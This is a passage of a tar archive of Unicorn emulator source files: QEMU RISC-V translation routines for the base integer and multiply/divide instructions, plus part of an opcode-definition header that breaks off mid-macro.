������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_rvi.inc.c������������������������������������������0000664�0000000�0000000�00000037737�14675241067�0023711�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V translation routines for the RVXI Base Integer Instruction Set. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ static bool trans_illegal(DisasContext *ctx, arg_empty *a) { gen_exception_illegal(ctx); return true; } static bool trans_lui(DisasContext *ctx, arg_lui *a) { if (a->rd != 0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[a->rd], a->imm); } return true; } static bool trans_auipc(DisasContext *ctx, arg_auipc *a) { if (a->rd != 0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[a->rd], a->imm + ctx->base.pc_next); } return true; } static bool trans_jal(DisasContext *ctx, arg_jal *a) { gen_jal(ctx, a->rd, a->imm); return true; } static bool trans_jalr(DisasContext *ctx, arg_jalr *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* no chaining with JALR */ TCGLabel *misaligned = NULL; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, tcg_ctx->cpu_pc, a->rs1); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_pc, a->imm); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_pc, (target_ulong)-2); if (!has_ext(ctx, RVC)) { misaligned = gen_new_label(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, tcg_ctx->cpu_pc, 0x2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, 0x0, misaligned); } if (a->rd != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[a->rd], ctx->pc_succ_insn); } lookup_and_goto_ptr(ctx); if (misaligned) { gen_set_label(tcg_ctx, misaligned); gen_exception_inst_addr_mis(ctx); } ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, t0); return true; } static bool gen_branch(DisasContext *ctx, arg_b *a, TCGCond cond) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l = gen_new_label(tcg_ctx); TCGv source1, source2; source1 = tcg_temp_new(tcg_ctx); source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_brcond_tl(tcg_ctx, cond, source1, source2, l); gen_goto_tb(ctx, 1, ctx->pc_succ_insn); gen_set_label(tcg_ctx, l); /* branch taken */ if (!has_ext(ctx, RVC) && ((ctx->base.pc_next + a->imm) & 0x3)) { /* misaligned */ gen_exception_inst_addr_mis(ctx); } else { gen_goto_tb(ctx, 0, ctx->base.pc_next + a->imm); } ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool trans_beq(DisasContext *ctx, arg_beq *a) { return gen_branch(ctx, a, TCG_COND_EQ); } static bool trans_bne(DisasContext *ctx, arg_bne *a) { return gen_branch(ctx, a, TCG_COND_NE); } static bool trans_blt(DisasContext *ctx, arg_blt *a) { return gen_branch(ctx, a, TCG_COND_LT); } static bool trans_bge(DisasContext *ctx, arg_bge *a) { return gen_branch(ctx, a, TCG_COND_GE); } static bool trans_bltu(DisasContext *ctx, arg_bltu *a) { return gen_branch(ctx, a, TCG_COND_LTU); } static bool trans_bgeu(DisasContext *ctx, arg_bgeu *a) { return gen_branch(ctx, a, TCG_COND_GEU); } static bool gen_load(DisasContext *ctx, arg_lb *a, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, memop); gen_set_gpr(tcg_ctx, a->rd, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); return true; } static bool trans_lb(DisasContext *ctx, arg_lb *a) { return gen_load(ctx, a, MO_SB); } static bool trans_lh(DisasContext *ctx, arg_lh *a) { return gen_load(ctx, a, MO_TESW); } static bool trans_lw(DisasContext *ctx, arg_lw *a) { return gen_load(ctx, a, MO_TESL); } static bool trans_lbu(DisasContext *ctx, arg_lbu *a) { return gen_load(ctx, a, MO_UB); } static bool trans_lhu(DisasContext *ctx, arg_lhu *a) { return gen_load(ctx, a, MO_TEUW); } static bool gen_store(DisasContext *ctx, arg_sb *a, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv dat = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); gen_get_gpr(tcg_ctx, dat, a->rs2); tcg_gen_qemu_st_tl(tcg_ctx, dat, t0, ctx->mem_idx, memop); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, dat); return true; } static bool trans_sb(DisasContext *ctx, arg_sb *a) { return gen_store(ctx, a, MO_SB); } static bool trans_sh(DisasContext *ctx, arg_sh *a) { return gen_store(ctx, a, MO_TESW); } static bool trans_sw(DisasContext *ctx, arg_sw *a) { return gen_store(ctx, a, MO_TESL); } #ifdef TARGET_RISCV64 static bool trans_lwu(DisasContext *ctx, arg_lwu *a) { return gen_load(ctx, a, MO_TEUL); } static bool trans_ld(DisasContext *ctx, arg_ld *a) { return gen_load(ctx, a, MO_TEQ); } static bool trans_sd(DisasContext *ctx, arg_sd *a) { return gen_store(ctx, a, MO_TEQ); } #endif static bool trans_addi(DisasContext *ctx, arg_addi *a) { return gen_arith_imm_fn(ctx, a, &tcg_gen_addi_tl); } static void gen_slt(TCGContext *tcg_ctx, TCGv ret, TCGv s1, TCGv s2) { tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, ret, s1, s2); } static void gen_sltu(TCGContext *tcg_ctx, TCGv ret, TCGv s1, TCGv s2) { tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LTU, ret, s1, s2); } static bool trans_slti(DisasContext *ctx, arg_slti *a) { return gen_arith_imm_tl(ctx, a, &gen_slt); } static bool trans_sltiu(DisasContext *ctx, arg_sltiu *a) { return gen_arith_imm_tl(ctx, a, &gen_sltu); } static bool trans_xori(DisasContext *ctx, arg_xori *a) { return gen_arith_imm_fn(ctx, a, &tcg_gen_xori_tl); } static bool trans_ori(DisasContext *ctx, arg_ori *a) { return gen_arith_imm_fn(ctx, a, &tcg_gen_ori_tl); } static bool trans_andi(DisasContext *ctx, arg_andi *a) { return gen_arith_imm_fn(ctx, a, &tcg_gen_andi_tl); } static bool trans_slli(DisasContext *ctx, arg_slli *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->shamt >= TARGET_LONG_BITS) { return false; } if (a->rd != 0) { TCGv t = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t, a->rs1); tcg_gen_shli_tl(tcg_ctx, t, t, a->shamt); gen_set_gpr(tcg_ctx, a->rd, t); tcg_temp_free(tcg_ctx, t); } /* NOP otherwise */ return true; } static bool trans_srli(DisasContext *ctx, arg_srli *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->shamt >= TARGET_LONG_BITS) { return false; } if (a->rd != 0) { TCGv t = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t, a->rs1); tcg_gen_shri_tl(tcg_ctx, t, t, a->shamt); gen_set_gpr(tcg_ctx, a->rd, t); tcg_temp_free(tcg_ctx, t); } /* NOP otherwise */ return true; } static bool trans_srai(DisasContext *ctx, arg_srai *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->shamt >= TARGET_LONG_BITS) { return false; } if (a->rd != 0) { TCGv t = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t, a->rs1); tcg_gen_sari_tl(tcg_ctx, t, t, a->shamt); gen_set_gpr(tcg_ctx, a->rd, t); tcg_temp_free(tcg_ctx, t); } /* NOP otherwise */ return true; } static bool trans_add(DisasContext *ctx, arg_add *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_add_tl); } static bool trans_sub(DisasContext *ctx, arg_sub *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_sub_tl); } static bool trans_sll(DisasContext *ctx, arg_sll *a) { return gen_shift(ctx, a, &tcg_gen_shl_tl); } static bool trans_slt(DisasContext *ctx, arg_slt *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_slt); } static bool trans_sltu(DisasContext *ctx, arg_sltu *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_sltu); } static bool trans_xor(DisasContext *ctx, arg_xor *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_xor_tl); } static bool trans_srl(DisasContext *ctx, arg_srl *a) { return gen_shift(ctx, a, &tcg_gen_shr_tl); } static bool trans_sra(DisasContext *ctx, arg_sra *a) { return gen_shift(ctx, a, &tcg_gen_sar_tl); } static bool trans_or(DisasContext *ctx, arg_or *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_or_tl); } static bool trans_and(DisasContext *ctx, arg_and *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_and_tl); } #ifdef TARGET_RISCV64 static bool trans_addiw(DisasContext *ctx, arg_addiw *a) { return gen_arith_imm_tl(ctx, a, &gen_addw); } static bool trans_slliw(DisasContext *ctx, arg_slliw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1; source1 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); tcg_gen_shli_tl(tcg_ctx, source1, source1, a->shamt); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); return true; } static bool trans_srliw(DisasContext *ctx, arg_srliw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t, a->rs1); tcg_gen_extract_tl(tcg_ctx, t, t, a->shamt, 32 - a->shamt); /* sign-extend for W instructions */ tcg_gen_ext32s_tl(tcg_ctx, t, t); gen_set_gpr(tcg_ctx, a->rd, t); tcg_temp_free(tcg_ctx, t); return true; } static bool trans_sraiw(DisasContext *ctx, arg_sraiw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t, a->rs1); tcg_gen_sextract_tl(tcg_ctx, t, t, a->shamt, 32 - a->shamt); gen_set_gpr(tcg_ctx, a->rd, t); tcg_temp_free(tcg_ctx, t); return true; } static bool trans_addw(DisasContext *ctx, arg_addw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_addw); } static bool trans_subw(DisasContext *ctx, arg_subw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_subw); } static bool trans_sllw(DisasContext *ctx, arg_sllw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_andi_tl(tcg_ctx, source2, source2, 0x1F); tcg_gen_shl_tl(tcg_ctx, source1, source1, source2); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool trans_srlw(DisasContext *ctx, arg_srlw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); /* clear upper 32 */ tcg_gen_ext32u_tl(tcg_ctx, source1, source1); tcg_gen_andi_tl(tcg_ctx, source2, source2, 0x1F); tcg_gen_shr_tl(tcg_ctx, source1, source1, source2); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool trans_sraw(DisasContext *ctx, arg_sraw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); /* * first, trick to get it to act like working on 32 bits (get rid of * upper 32, sign extend to fill space) */ tcg_gen_ext32s_tl(tcg_ctx, source1, source1); tcg_gen_andi_tl(tcg_ctx, source2, source2, 0x1F); tcg_gen_sar_tl(tcg_ctx, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } #endif static bool trans_fence(DisasContext *ctx, arg_fence *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* FENCE is a full memory barrier. */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); return true; } static bool trans_fence_i(DisasContext *ctx, arg_fence_i *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (!ctx->ext_ifencei) { return false; } /* * FENCE_I is a no-op in QEMU, * however we need to end the translation block */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->pc_succ_insn); exit_tb(ctx); ctx->base.is_jmp = DISAS_NORETURN; return true; } #define RISCV_OP_CSR_PRE do {\ source1 = tcg_temp_new(tcg_ctx); \ csr_store = tcg_temp_new(tcg_ctx); \ dest = tcg_temp_new(tcg_ctx); \ rs1_pass = tcg_temp_new(tcg_ctx); \ gen_get_gpr(tcg_ctx, source1, a->rs1); \ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); \ tcg_gen_movi_tl(tcg_ctx, rs1_pass, a->rs1); \ tcg_gen_movi_tl(tcg_ctx, csr_store, a->csr); \ gen_io_start(tcg_ctx);\ } while (0) #define RISCV_OP_CSR_POST do {\ gen_set_gpr(tcg_ctx, a->rd, dest); \ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->pc_succ_insn); \ exit_tb(ctx); \ ctx->base.is_jmp = DISAS_NORETURN; \ tcg_temp_free(tcg_ctx, source1); \ tcg_temp_free(tcg_ctx, csr_store); \ tcg_temp_free(tcg_ctx, dest); \ tcg_temp_free(tcg_ctx, rs1_pass); \ } while (0) static bool trans_csrrw(DisasContext *ctx, arg_csrrw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrw(tcg_ctx, dest, tcg_ctx->cpu_env, source1, csr_store); RISCV_OP_CSR_POST; return true; } static bool trans_csrrs(DisasContext *ctx, arg_csrrs *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrs(tcg_ctx, dest, tcg_ctx->cpu_env, source1, csr_store, rs1_pass); RISCV_OP_CSR_POST; return true; } static bool trans_csrrc(DisasContext *ctx, arg_csrrc *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrc(tcg_ctx, dest, tcg_ctx->cpu_env, source1, csr_store, rs1_pass); RISCV_OP_CSR_POST; return true; } static bool trans_csrrwi(DisasContext *ctx, arg_csrrwi *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrw(tcg_ctx, dest, tcg_ctx->cpu_env, rs1_pass, csr_store); RISCV_OP_CSR_POST; return true; } static bool trans_csrrsi(DisasContext *ctx, arg_csrrsi *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrs(tcg_ctx, dest, tcg_ctx->cpu_env, rs1_pass, csr_store, rs1_pass); RISCV_OP_CSR_POST; return true; } static bool trans_csrrci(DisasContext *ctx, arg_csrrci *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, csr_store, dest, rs1_pass; RISCV_OP_CSR_PRE; gen_helper_csrrc(tcg_ctx, dest, tcg_ctx->cpu_env, rs1_pass, csr_store, rs1_pass); RISCV_OP_CSR_POST; return true; } ���������������������������������unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_rvm.inc.c������������������������������������������0000664�0000000�0000000�00000007467�14675241067�0023712�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V translation routines for the RV64M Standard Extension. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ static bool trans_mul(DisasContext *ctx, arg_mul *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &tcg_gen_mul_tl); } static bool trans_mulh(DisasContext *ctx, arg_mulh *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; REQUIRE_EXT(ctx, RVM); TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_muls2_tl(tcg_ctx, source2, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool trans_mulhsu(DisasContext *ctx, arg_mulhsu *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_mulhsu); } static bool trans_mulhu(DisasContext *ctx, arg_mulhu *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; REQUIRE_EXT(ctx, RVM); TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_mulu2_tl(tcg_ctx, source2, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool trans_div(DisasContext *ctx, arg_div *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_div); } static bool trans_divu(DisasContext *ctx, arg_divu *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_divu); } static bool trans_rem(DisasContext *ctx, arg_rem *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_rem); } static bool trans_remu(DisasContext *ctx, arg_remu *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_remu); } #ifdef TARGET_RISCV64 static bool trans_mulw(DisasContext *ctx, arg_mulw *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith(tcg_ctx, a, &gen_mulw); } static bool trans_divw(DisasContext *ctx, arg_divw *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith_div_w(tcg_ctx, a, &gen_div); } static bool trans_divuw(DisasContext *ctx, arg_divuw *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith_div_uw(tcg_ctx, a, &gen_divu); } static bool trans_remw(DisasContext *ctx, arg_remw *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith_div_w(tcg_ctx, a, &gen_rem); } static bool trans_remuw(DisasContext *ctx, arg_remuw *a) { REQUIRE_EXT(ctx, RVM); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; return gen_arith_div_uw(tcg_ctx, a, &gen_remu); } #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/instmap.h�����������������������������������������������������������0000664�0000000�0000000�00000037074�14675241067�0020426�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V emulation for qemu: Instruction decode helpers * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #ifndef TARGET_RISCV_INSTMAP_H #define TARGET_RISCV_INSTMAP_H #define MASK_OP_MAJOR(op) (op & 0x7F) enum { /* rv32i, rv64i, rv32m */ OPC_RISC_LUI = (0x37), OPC_RISC_AUIPC = (0x17), OPC_RISC_JAL = (0x6F), OPC_RISC_JALR = (0x67), OPC_RISC_BRANCH = (0x63), OPC_RISC_LOAD = (0x03), OPC_RISC_STORE = (0x23), OPC_RISC_ARITH_IMM = (0x13), OPC_RISC_ARITH = (0x33), OPC_RISC_FENCE = (0x0F), OPC_RISC_SYSTEM = (0x73), /* rv64i, rv64m */ OPC_RISC_ARITH_IMM_W = (0x1B), OPC_RISC_ARITH_W = (0x3B), /* rv32a, rv64a */ OPC_RISC_ATOMIC = (0x2F), /* floating point */ OPC_RISC_FP_LOAD = (0x7), OPC_RISC_FP_STORE = (0x27), OPC_RISC_FMADD = (0x43), OPC_RISC_FMSUB = (0x47), OPC_RISC_FNMSUB = (0x4B), OPC_RISC_FNMADD = (0x4F), OPC_RISC_FP_ARITH = (0x53), }; #define MASK_OP_ARITH(op) (MASK_OP_MAJOR(op) | (op & ((0x7 << 12) | \ (0x7F << 25)))) enum { OPC_RISC_ADD = OPC_RISC_ARITH | (0x0 << 12) | (0x00 << 25), OPC_RISC_SUB = OPC_RISC_ARITH | (0x0 << 12) | (0x20 << 25), OPC_RISC_SLL = OPC_RISC_ARITH | (0x1 << 12) | (0x00 << 25), OPC_RISC_SLT = OPC_RISC_ARITH | (0x2 << 12) | (0x00 << 25), OPC_RISC_SLTU = OPC_RISC_ARITH | (0x3 << 12) | (0x00 << 25), OPC_RISC_XOR = OPC_RISC_ARITH | (0x4 << 12) | (0x00 << 25), OPC_RISC_SRL = OPC_RISC_ARITH | (0x5 << 12) | (0x00 << 25), OPC_RISC_SRA = OPC_RISC_ARITH | (0x5 << 12) | (0x20 << 25), OPC_RISC_OR = OPC_RISC_ARITH | (0x6 << 12) | (0x00 << 25), OPC_RISC_AND = OPC_RISC_ARITH | (0x7 << 12) | (0x00 << 25), /* RV64M */ OPC_RISC_MUL = OPC_RISC_ARITH | (0x0 << 12) | (0x01 << 25), OPC_RISC_MULH = OPC_RISC_ARITH | (0x1 << 12) | (0x01 << 25), OPC_RISC_MULHSU = OPC_RISC_ARITH | (0x2 << 12) | (0x01 << 25), OPC_RISC_MULHU = OPC_RISC_ARITH | (0x3 << 12) | (0x01 << 25), OPC_RISC_DIV = OPC_RISC_ARITH | (0x4 << 12) | (0x01 << 25), OPC_RISC_DIVU = OPC_RISC_ARITH | (0x5 << 12) | (0x01 << 25), OPC_RISC_REM = OPC_RISC_ARITH | (0x6 << 12) | (0x01 << 25), OPC_RISC_REMU = OPC_RISC_ARITH | (0x7 << 12) | (0x01 << 25), }; #define MASK_OP_ARITH_IMM(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_ADDI = OPC_RISC_ARITH_IMM | (0x0 << 12), OPC_RISC_SLTI = OPC_RISC_ARITH_IMM | (0x2 << 12), OPC_RISC_SLTIU = OPC_RISC_ARITH_IMM | (0x3 << 12), OPC_RISC_XORI = OPC_RISC_ARITH_IMM | (0x4 << 12), OPC_RISC_ORI = OPC_RISC_ARITH_IMM | (0x6 << 12), OPC_RISC_ANDI = OPC_RISC_ARITH_IMM | (0x7 << 12), OPC_RISC_SLLI = OPC_RISC_ARITH_IMM | (0x1 << 12), /* additional part of IMM */ OPC_RISC_SHIFT_RIGHT_I = OPC_RISC_ARITH_IMM | (0x5 << 12) /* SRAI, SRLI */ }; #define MASK_OP_BRANCH(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_BEQ = OPC_RISC_BRANCH | (0x0 << 12), OPC_RISC_BNE = OPC_RISC_BRANCH | (0x1 << 12), OPC_RISC_BLT = OPC_RISC_BRANCH | (0x4 << 12), OPC_RISC_BGE = OPC_RISC_BRANCH | (0x5 << 12), OPC_RISC_BLTU = OPC_RISC_BRANCH | (0x6 << 12), OPC_RISC_BGEU = OPC_RISC_BRANCH | (0x7 << 12) }; enum { OPC_RISC_ADDIW = OPC_RISC_ARITH_IMM_W | (0x0 << 12), OPC_RISC_SLLIW = OPC_RISC_ARITH_IMM_W | (0x1 << 12), /* additional part of IMM */ OPC_RISC_SHIFT_RIGHT_IW = OPC_RISC_ARITH_IMM_W | (0x5 << 12) /* SRAI, SRLI */ }; enum { OPC_RISC_ADDW = OPC_RISC_ARITH_W | (0x0 << 12) | (0x00 << 25), OPC_RISC_SUBW = OPC_RISC_ARITH_W | (0x0 << 12) | (0x20 << 25), OPC_RISC_SLLW = OPC_RISC_ARITH_W | (0x1 << 12) | (0x00 << 25), OPC_RISC_SRLW = OPC_RISC_ARITH_W | (0x5 << 12) | (0x00 << 25), OPC_RISC_SRAW = OPC_RISC_ARITH_W | (0x5 << 12) | (0x20 << 25), /* RV64M */ OPC_RISC_MULW = OPC_RISC_ARITH_W | (0x0 << 12) | (0x01 << 25), OPC_RISC_DIVW = OPC_RISC_ARITH_W | (0x4 << 12) | (0x01 << 25), OPC_RISC_DIVUW = OPC_RISC_ARITH_W | (0x5 << 12) | (0x01 << 25), OPC_RISC_REMW = OPC_RISC_ARITH_W | (0x6 << 12) | (0x01 << 25), OPC_RISC_REMUW = OPC_RISC_ARITH_W | (0x7 << 12) | (0x01 << 25), }; #define MASK_OP_LOAD(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_LB = OPC_RISC_LOAD | (0x0 << 12), OPC_RISC_LH = OPC_RISC_LOAD | (0x1 << 12), OPC_RISC_LW = OPC_RISC_LOAD | (0x2 << 12), OPC_RISC_LD = OPC_RISC_LOAD | (0x3 << 12), OPC_RISC_LBU = OPC_RISC_LOAD | (0x4 << 12), OPC_RISC_LHU = OPC_RISC_LOAD | (0x5 << 12), OPC_RISC_LWU = OPC_RISC_LOAD | (0x6 << 12), }; #define MASK_OP_STORE(op) (MASK_OP_MAJOR(op) | (op & (0x7 << 12))) enum { OPC_RISC_SB = OPC_RISC_STORE | (0x0 << 12), OPC_RISC_SH = OPC_RISC_STORE | (0x1 << 12), OPC_RISC_SW = OPC_RISC_STORE | (0x2 << 12), OPC_RISC_SD = OPC_RISC_STORE | (0x3 << 12), }; #define MASK_OP_JALR(op) (MASK_OP_MAJOR(op) | 